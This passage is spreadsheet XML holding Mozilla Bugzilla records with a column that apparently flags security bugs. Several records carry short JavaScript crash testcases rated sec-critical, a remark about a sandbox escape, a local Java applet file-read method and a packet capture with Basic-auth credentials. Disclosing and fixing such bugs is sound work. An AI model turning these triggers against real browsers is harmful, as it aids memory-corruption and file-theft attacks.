04 xul!nsThread::ProcessNextEvent
05 xul!NS_ProcessNextEvent
```
Definitily with some work, it is possible to achieve code execution in Firefox main process (Sandbox escape).
Thank you</t>
        </is>
      </c>
      <c r="X2991" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2992">
      <c r="A2992" t="n">
        <v>849014</v>
      </c>
      <c r="B2992" t="inlineStr">
        <is>
          <t>2013-03-07 14:56:11 -0800</t>
        </is>
      </c>
      <c r="C2992" t="inlineStr">
        <is>
          <t>IonMonkey: Crash [@ js::RegExpGuard::operator*] or "Assertion failure: isRegExp(),"</t>
        </is>
      </c>
      <c r="D2992" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:49 -0800</t>
        </is>
      </c>
      <c r="E2992" t="n">
        <v>1</v>
      </c>
      <c r="F2992" t="n">
        <v>1</v>
      </c>
      <c r="G2992" t="n">
        <v>3</v>
      </c>
      <c r="H2992" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2992" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2992" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2992" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2992" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2992" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2992" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2992" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2992" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main20+]</t>
        </is>
      </c>
      <c r="Q2992" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2992" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2992" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2992" t="n">
        <v>1</v>
      </c>
      <c r="U2992" t="n">
        <v>0</v>
      </c>
      <c r="V2992" t="n">
        <v>41</v>
      </c>
      <c r="W2992" t="inlineStr">
        <is>
          <t>Created attachment 722504
stack
Map.prototype.has = /x/.test
x = [false]
y = Map()
Array.prototype.forEach.call(x, (function() {
    y.has('')
}))
asserts js debug shell on m-c changeset 71395a927025 with --ion-eager at Assertion failure: isRegExp(), and crashes js opt shell at a weird memory address with js::RegExpGuard::operator* on the stack. Another weird memory address 0x00000001006942bb is also on the stack.
Locking s-s pending further security analysis, assuming sec-critical since a weird memory address is on the stack.</t>
        </is>
      </c>
      <c r="X2992" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2993">
      <c r="A2993" t="n">
        <v>370707</v>
      </c>
      <c r="B2993" t="inlineStr">
        <is>
          <t>2007-02-16 19:49:05 -0800</t>
        </is>
      </c>
      <c r="C2993" t="inlineStr">
        <is>
          <t>Create a Status Update for Bugzilla 3.0rc1</t>
        </is>
      </c>
      <c r="D2993" t="inlineStr">
        <is>
          <t>2007-02-26 14:16:34 -0800</t>
        </is>
      </c>
      <c r="E2993" t="n">
        <v>1</v>
      </c>
      <c r="F2993" t="n">
        <v>1</v>
      </c>
      <c r="G2993" t="n">
        <v>4</v>
      </c>
      <c r="H2993" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2993" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2993" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K2993" t="inlineStr">
        <is>
          <t>2.23.4</t>
        </is>
      </c>
      <c r="L2993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2993" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2993" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2993" t="inlineStr"/>
      <c r="Q2993" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2993" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2993" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T2993" t="n">
        <v>1</v>
      </c>
      <c r="U2993" t="n">
        <v>0</v>
      </c>
      <c r="V2993" t="n">
        <v>6</v>
      </c>
      <c r="W2993" t="inlineStr">
        <is>
          <t>We haven't done one of these in a while, and we have news worthy of sharing. :)</t>
        </is>
      </c>
      <c r="X2993" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2994">
      <c r="A2994" t="n">
        <v>1096318</v>
      </c>
      <c r="B2994" t="inlineStr">
        <is>
          <t>2014-11-10 06:36:56 -0800</t>
        </is>
      </c>
      <c r="C2994" t="inlineStr">
        <is>
          <t>Restricting a bug's visibility does not delete any associated MozReview review requests</t>
        </is>
      </c>
      <c r="D2994" t="inlineStr">
        <is>
          <t>2019-10-15 16:23:59 -0700</t>
        </is>
      </c>
      <c r="E2994" t="n">
        <v>1</v>
      </c>
      <c r="F2994" t="n">
        <v>1</v>
      </c>
      <c r="G2994" t="n">
        <v>7</v>
      </c>
      <c r="H2994" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2994" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J2994" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K2994" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L2994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2994" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2994" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2994" t="inlineStr"/>
      <c r="Q2994" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2994" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2994" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2994" t="n">
        <v>1</v>
      </c>
      <c r="U2994" t="n">
        <v>0</v>
      </c>
      <c r="V2994" t="n">
        <v>12</v>
      </c>
      <c r="W2994" t="inlineStr">
        <is>
          <t>I pushed a test review request (https://reviewboard.mozilla.org/r/361) for an invalid bug (bug 1072809), published the review request, and then marked the bug as visible to MoCo employees only.  This should have deleted the review request as per bug 993223, but nothing happened; the review request still exists and is visible.
Several things have changed in MozReview since bug 993223 was fixed, so maybe something broke it.  I'm going to file a separate bug for a version-control-tools test.</t>
        </is>
      </c>
      <c r="X2994" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2995">
      <c r="A2995" t="n">
        <v>787283</v>
      </c>
      <c r="B2995" t="inlineStr">
        <is>
          <t>2012-08-30 18:16:03 -0700</t>
        </is>
      </c>
      <c r="C2995" t="inlineStr">
        <is>
          <t>Assertion failure: i &gt;= 0, at jsopcode.cpp:5820 or Crash [@ js::DecompileValueGenerator]</t>
        </is>
      </c>
      <c r="D2995" t="inlineStr">
        <is>
          <t>2013-11-25 16:40:53 -0800</t>
        </is>
      </c>
      <c r="E2995" t="n">
        <v>1</v>
      </c>
      <c r="F2995" t="n">
        <v>1</v>
      </c>
      <c r="G2995" t="n">
        <v>3</v>
      </c>
      <c r="H2995" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2995" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2995" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2995" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2995" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2995" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2995" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2995" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2995" t="inlineStr">
        <is>
          <t>[js:t] [jsbugmon:][adv-main21+][adv-esr1706+] fixed by bug 810525</t>
        </is>
      </c>
      <c r="Q2995" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2995" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2995" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T2995" t="n">
        <v>1</v>
      </c>
      <c r="U2995" t="n">
        <v>0</v>
      </c>
      <c r="V2995" t="n">
        <v>34</v>
      </c>
      <c r="W2995" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 1b0b56afa33a (run with -m -n -a):
Object.prototype.apply = Function.prototype.apply;
function testApplyCallHelper(f) {
    var i = 0;
    i.apply(this,[,,2])
}
testApplyCallHelper()</t>
        </is>
      </c>
      <c r="X2995" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2996">
      <c r="A2996" t="n">
        <v>421484</v>
      </c>
      <c r="B2996" t="inlineStr">
        <is>
          <t>2008-03-07 03:26:09 -0800</t>
        </is>
      </c>
      <c r="C2996" t="inlineStr">
        <is>
          <t>Tinderbox can't test for existing symlink on stage-new</t>
        </is>
      </c>
      <c r="D2996" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2996" t="n">
        <v>1</v>
      </c>
      <c r="F2996" t="n">
        <v>1</v>
      </c>
      <c r="G2996" t="n">
        <v>5</v>
      </c>
      <c r="H2996" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2996" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2996" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2996" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2996" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2996" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2996" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2996" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2996" t="inlineStr"/>
      <c r="Q2996" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2996" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2996" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2996" t="n">
        <v>1</v>
      </c>
      <c r="U2996" t="n">
        <v>0</v>
      </c>
      <c r="V2996" t="n">
        <v>8</v>
      </c>
      <c r="W2996" t="inlineStr">
        <is>
          <t>A while back, we introduced this code to tinderbox
 push(@cmds,"ssh $ssh_opts -l $Settings::ssh_user $ssh_server 'cd $remote_path &amp;&amp; if [ ! -h $short_ud ]; then ln -s ${datedir}${short_ud} .; fi'");
which makes a symlink from
   firefox/nightly/2008-03-06-09-mozilla1.8
to where the files really are in
   firefox/nightly/2008/03/2008-03-06-09-mozilla1.8
The chroot jail used on stage-new doesn't have a real shell, so the test fails and we don't get a symlink. This is the last step so the builds still get published, they're just kinda hidden away.</t>
        </is>
      </c>
      <c r="X2996" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2997">
      <c r="A2997" t="n">
        <v>651030</v>
      </c>
      <c r="B2997" t="inlineStr">
        <is>
          <t>2011-04-18 21:26:49 -0700</t>
        </is>
      </c>
      <c r="C2997" t="inlineStr">
        <is>
          <t>"Assertion failure: JSVAL_IS_DOUBLE_IMPL(data)"</t>
        </is>
      </c>
      <c r="D2997" t="inlineStr">
        <is>
          <t>2011-11-14 18:54:20 -0800</t>
        </is>
      </c>
      <c r="E2997" t="n">
        <v>1</v>
      </c>
      <c r="F2997" t="n">
        <v>1</v>
      </c>
      <c r="G2997" t="n">
        <v>3</v>
      </c>
      <c r="H2997" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2997" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2997" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2997" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2997" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2997" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2997" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2997" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2997" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed-in-tracemonkey][qa-]</t>
        </is>
      </c>
      <c r="Q2997" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2997" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2997" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2997" t="n">
        <v>1</v>
      </c>
      <c r="U2997" t="n">
        <v>0</v>
      </c>
      <c r="V2997" t="n">
        <v>25</v>
      </c>
      <c r="W2997" t="inlineStr">
        <is>
          <t>Created attachment 526925
testcase (crashes Firefox when loaded)
Assertion failure: JSVAL_IS_DOUBLE_IMPL(data), at js/src/jsvalue.h:715
TM branch only. I'm guessing it's a TM branch regression.
(Tested using http://hg.mozilla.org/tracemonkey/rev/59325b2ca38b)</t>
        </is>
      </c>
      <c r="X2997" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2998">
      <c r="A2998" t="n">
        <v>281851</v>
      </c>
      <c r="B2998" t="inlineStr">
        <is>
          <t>2005-02-10 14:16:02 -0800</t>
        </is>
      </c>
      <c r="C2998" t="inlineStr">
        <is>
          <t>CVE-2005-2395 Wrong scheme used when server offers both Basic and Digest auth [rfc2617 obsoletes rfc2068]</t>
        </is>
      </c>
      <c r="D2998" t="inlineStr">
        <is>
          <t>2022-02-27 08:21:46 -0800</t>
        </is>
      </c>
      <c r="E2998" t="n">
        <v>1</v>
      </c>
      <c r="F2998" t="n">
        <v>1</v>
      </c>
      <c r="G2998" t="n">
        <v>3</v>
      </c>
      <c r="H2998" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2998" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2998" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K2998" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2998" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2998" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2998" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2998" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2998" t="inlineStr">
        <is>
          <t>[sg:low][sg:want][necko-would-take][adv-main93-]</t>
        </is>
      </c>
      <c r="Q2998" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R2998" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2998" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2998" t="n">
        <v>1</v>
      </c>
      <c r="U2998" t="n">
        <v>10</v>
      </c>
      <c r="V2998" t="n">
        <v>41</v>
      </c>
      <c r="W2998" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
When connecting to a web server that offers both HTTP Basic authentication and
HTTP Digest authentication, Firefox selects to perform Basic authentication
rather then the more secure Digest authentication scheme. This behavior is in
contrast to RFC 2617 requirement, which describes HTTP authentication:
------------------------------------------------------------
4.6 Weakness Created by Multiple Authentication Schemes
   An HTTP/1.1 server may return multiple challenges with a 401
   (Authenticate) response, and each challenge may use a different
   auth-scheme. A user agent MUST choose to use the strongest auth-
   scheme it understands and request credentials from the user based
   upon that challenge
------------------------------------------------------------
Reproducible: Always
Steps to Reproduce:
1. Setup a Web Server to support both Basic and Digest authentication mode in
parallel i.e. IIS server in a windows domain
2. Use firefox to connect to the web-server.
3. send user/pass credentials, when Firefox prompts the for credentials.
4. Use a network sniffer to to track traffic.
5. analyze sniffer dump, note that Firefox sends the user's credential to the
wb-server, specifying HTTP Basic scheme. 
Actual Results:  
from network sniffer:
// first un-authenitcated request send from client
Frame 4 (452 bytes on wire, 452 bytes captured)    
Ethernet II, Src: 00:d0:59:cd:24:38, Dst: 00:0c:f1:33:e2:ff
Internet Protocol, Src Addr: 192.168.2.2 (192.168.2.2), Dst Addr: 192.168.2.94
(192.168.2.94)
Transmission Control Protocol, Src Port: 1646 (1646), Dst Port: http (80), Seq:
1, Ack: 1, Len: 398
Hypertext Transfer Protocol
    GET / HTTP/1.0\r\n
        Request Method: GET
    Host: 192.168.2.94\r\n
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0\r\n
    Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
    Accept-Language: en-us,en;q=0.5\r\n
    Accept-Encoding: gzip,deflate\r\n
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
    Keep-Alive: 300\r\n
    Connection: keep-alive\r\n
    \r\n
...
// server sends un-authorized response indicating support for both basic and digest
Frame 5 (1514 bytes on wire, 1514 bytes captured)
Ethernet II, Src: 00:0c:f1:33:e2:ff, Dst: 00:d0:59:cd:24:38
Internet Protocol, Src Addr: 192.168.2.94 (192.168.2.94), Dst Addr: 192.168.2.2
(192.168.2.2)
Transmission Control Protocol, Src Port: http (80), Dst Port: 1646 (1646), Seq:
1, Ack: 399, Len: 1460
Hypertext Transfer Protocol
    HTTP/1.1 401 Access Denied\r\n
        Response Code: 401
    Server: Microsoft-IIS/5.1\r\n
    Date: Thu, 10 Feb 2005 21:33:02 GMT\r\n
    WWW-Authenticate: Basic realm="corp.intel.com"\r\n
    Content-Length: 4431\r\n
    WWW-Authenticate: Digest qop="auth", realm="corp.intel.com",
nonce="964f5a7cd20d6b8f10246120000062720c8897eaebb6bbccd1a7a2999dd0"\r\n
    Content-Type: text/html\r\n
    \r\n
...
//client send an authenticated response specifying HTTP Basic scheme
Frame 16 (487 bytes on wire, 487 bytes captured)
Ethernet II, Src: 00:d0:59:cd:24:38, Dst: 00:0c:f1:33:e2:ff
Internet Protocol, Src Addr: 192.168.2.2 (192.168.2.2), Dst Addr: 192.168.2.94
(192.168.2.94)
Transmission Control Protocol, Src Port: 1647 (1647), Dst Port: http (80), Seq:
1, Ack: 1, Len: 433
Hypertext Transfer Protocol
    GET / HTTP/1.0\r\n
        Request Method: GET
    Host: 192.168.2.94\r\n
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)
Gecko/20041107 Firefox/1.0\r\n
    Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
    Accept-Language: en-us,en;q=0.5\r\n
    Accept-Encoding: gzip,deflate\r\n
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
    Keep-Alive: 300\r\n
    Connection: keep-alive\r\n
    Authorization: Basic ZG9yaTpkb3Jp\r\n
        Credentials: dori:dori
    \r\n
Expected Results:  
Firefox should select to use HTTP Digest authentication scheme, when presented
with both Digest and Basic authentication scheme, as required in RFC 2617</t>
        </is>
      </c>
      <c r="X2998" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2999">
      <c r="A2999" t="n">
        <v>547625</v>
      </c>
      <c r="B2999" t="inlineStr">
        <is>
          <t>2010-02-21 17:44:23 -0800</t>
        </is>
      </c>
      <c r="C2999" t="inlineStr">
        <is>
          <t>error emails from nightly update generation (no updates for win32 m-1.9.2 l10n)</t>
        </is>
      </c>
      <c r="D2999" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2999" t="n">
        <v>1</v>
      </c>
      <c r="F2999" t="n">
        <v>1</v>
      </c>
      <c r="G2999" t="n">
        <v>5</v>
      </c>
      <c r="H2999" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2999" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2999" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2999" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2999" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2999" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2999" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2999" t="inlineStr"/>
      <c r="Q2999" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2999" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2999" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2999" t="n">
        <v>1</v>
      </c>
      <c r="U2999" t="n">
        <v>0</v>
      </c>
      <c r="V2999" t="n">
        <v>3</v>
      </c>
      <c r="W2999" t="inlineStr">
        <is>
          <t>Created attachment 428117
Error
Got the first of these at 21 February 2010 07:00 PST. Only looked at few of the 300+ but they're all failing on win32 el on mozilla-central. On the plus side this only seems to block win32 m-c l10n updates.
Notice that its skipping the 20100219 el build for some reason, and it's 
  Touching /builds/nightly-partial-generation/aus/0//////partial.txt
so something is going wrong with assigning values to the path. (Of course there's no point it generating partials except for the most recent pairs of builds, but that's another story.)
Assigning to coop since he knows what changed here. Perhaps fallout from interrupting a run ?</t>
        </is>
      </c>
      <c r="X2999" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3000">
      <c r="A3000" t="n">
        <v>880544</v>
      </c>
      <c r="B3000" t="inlineStr">
        <is>
          <t>2013-06-06 18:13:42 -0700</t>
        </is>
      </c>
      <c r="C3000" t="inlineStr">
        <is>
          <t>"ABORT: Tear-off objects remain in hashtable at shutdown" with watch on SVGPathSegList</t>
        </is>
      </c>
      <c r="D3000" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:22 -0800</t>
        </is>
      </c>
      <c r="E3000" t="n">
        <v>1</v>
      </c>
      <c r="F3000" t="n">
        <v>1</v>
      </c>
      <c r="G3000" t="n">
        <v>3</v>
      </c>
      <c r="H3000" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3000" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3000" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K3000" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3000" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3000" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3000" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3000" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3000" t="inlineStr">
        <is>
          <t>[adv-main25+]</t>
        </is>
      </c>
      <c r="Q3000" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3000" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3000" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3000" t="n">
        <v>1</v>
      </c>
      <c r="U3000" t="n">
        <v>0</v>
      </c>
      <c r="V3000" t="n">
        <v>34</v>
      </c>
      <c r="W3000" t="inlineStr">
        <is>
          <t>Created attachment 759529
testcase (asserts on shutdown)
###!!! ABORT: Tear-off objects remain in hashtable at shutdown.: 'mTable.Count() == 0', file content/svg/content/src/nsSVGAttrTearoffTable.h, line 28
nsSVGAttrTearoffTable&lt;void, mozilla::DOMSVGPathSegList&gt;::~nsSVGAttrTearoffTable
Security-sensitive because last time I filed a bug involving this assertion (bug 872790), it was marked as a dup of a security-sensitive bug.</t>
        </is>
      </c>
      <c r="X3000" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3001">
      <c r="A3001" t="n">
        <v>1087298</v>
      </c>
      <c r="B3001" t="inlineStr">
        <is>
          <t>2014-10-22 05:36:23 -0700</t>
        </is>
      </c>
      <c r="C3001" t="inlineStr">
        <is>
          <t>revise permissions page for superusers</t>
        </is>
      </c>
      <c r="D3001" t="inlineStr">
        <is>
          <t>2014-10-30 06:31:52 -0700</t>
        </is>
      </c>
      <c r="E3001" t="n">
        <v>1</v>
      </c>
      <c r="F3001" t="n">
        <v>1</v>
      </c>
      <c r="G3001" t="n">
        <v>4</v>
      </c>
      <c r="H3001" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3001" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3001" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3001" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3001" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3001" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3001" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3001" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3001" t="inlineStr"/>
      <c r="Q3001" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3001" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3001" t="inlineStr">
        <is>
          <t>108</t>
        </is>
      </c>
      <c r="T3001" t="n">
        <v>1</v>
      </c>
      <c r="U3001" t="n">
        <v>0</v>
      </c>
      <c r="V3001" t="n">
        <v>3</v>
      </c>
      <c r="W3001" t="inlineStr">
        <is>
          <t>On the page explaining a users permissions we have logic to detect superusers and tell them they have all permissions. Then we tell them the permissions they do _and_ don't have for their group. This can result in a case where a superuser in a low ranking group like hackers lite can be told "you have all permissions" and immedietly told "you don't have the following permissions".
Since superuser wins, if we see a superuser we should report that instead of the group permissions. Eventually superuser will become a group and this will be moot, but let's not confuse anyone now.</t>
        </is>
      </c>
      <c r="X3001" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3002">
      <c r="A3002" t="n">
        <v>406541</v>
      </c>
      <c r="B3002" t="inlineStr">
        <is>
          <t>2007-12-03 01:43:08 -0800</t>
        </is>
      </c>
      <c r="C3002" t="inlineStr">
        <is>
          <t>local java applet may read arbitrary files under certain circumstances</t>
        </is>
      </c>
      <c r="D3002" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E3002" t="n">
        <v>1</v>
      </c>
      <c r="F3002" t="n">
        <v>1</v>
      </c>
      <c r="G3002" t="n">
        <v>6</v>
      </c>
      <c r="H3002" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3002" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3002" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3002" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3002" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3002" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3002" t="inlineStr">
        <is>
          <t>[adv-main23+]</t>
        </is>
      </c>
      <c r="Q3002" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3002" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3002" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3002" t="n">
        <v>1</v>
      </c>
      <c r="U3002" t="n">
        <v>0</v>
      </c>
      <c r="V3002" t="n">
        <v>120</v>
      </c>
      <c r="W3002" t="inlineStr">
        <is>
          <t>Created attachment 291181
a1.java - compiled a1.class must be saved in /tmp/DumbUglyB1llMarriedDumbUglyB1tch
recent trunk has restrictions on what local html can access
in bug 402998 Comment #8 someone with sun.com email asked to "post a test" for local applet circumventing restrictions.
it is like beating a death horse, but here it is:
if the path of the locally saved applet is known at applet compile time, the applet can read any file.
note that if the luser saves files in a single directory, a two stage attack may be successful with high probability.
suppose the applet is saved in directory:
/tmp/DumbUglyB1llMarriedDumbUglyB1tch
it should be instantiated like this:
&lt;applet codebase="file:///" 
code="tmp.DumbUglyB1llMarriedDumbUglyB1tch.a1"&gt;
&lt;/applet&gt;
